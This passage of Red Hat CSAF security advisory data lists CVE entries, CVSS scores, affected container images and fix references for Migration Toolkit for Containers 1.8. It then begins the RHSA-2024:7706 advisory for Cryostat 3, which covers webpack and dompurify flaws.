"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024:7706
Vulnerability from csaf_redhat - Published: 2024-10-07 01:12 - Updated: 2025-11-21 19:13Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7706",
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Cryostat security update",
"tracking": {
"current_release_date": "2025-11-21T19:13:59+00:00",
"generator": {
"date": "2025-11-21T19:13:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:7706",
"initial_release_date": "2024-10-07T01:12:29+00:00",
"revision_history": [
{
"date": "2024-10-07T01:12:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T01:12:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:13:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Cryostat 3 on RHEL 8",
"product": {
"name": "Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:cryostat:3::el8"
}
}
}
],
"category": "product_family",
"name": "Cryostat"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product": {
